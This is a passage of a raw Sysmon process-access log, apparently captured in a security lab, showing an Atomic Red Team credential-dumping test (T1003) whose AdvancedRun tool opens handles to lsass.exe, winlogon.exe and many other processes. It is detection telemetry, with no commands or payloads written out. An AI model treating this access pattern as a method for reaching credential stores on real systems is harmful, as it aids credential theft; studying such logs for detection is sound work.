17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedT